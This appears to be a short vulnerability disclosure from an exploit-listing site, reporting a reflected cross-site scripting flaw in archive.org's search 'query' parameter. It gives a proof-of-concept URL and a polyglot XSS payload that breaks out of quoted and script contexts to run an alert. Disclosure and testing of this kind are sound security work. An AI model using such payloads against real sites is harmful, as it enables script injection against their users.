archive.org xss vulnerability

2020.03.29

Amirali Sadeghi (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#Exploit Title : archive.org XSS
#Date : 2020/3/29
#Exploit Author : AmirAli Sadeghi Tamiz
#Tested on : win10
#Demo : https://archive.org/search.php?query=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#POC:
1- go to archive.org
2-go to meta data search (archive.org/search.php?query=)
3-Parameter query is vulnerable 
4-payload is: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

archive.org xss vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

archive.org xss vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.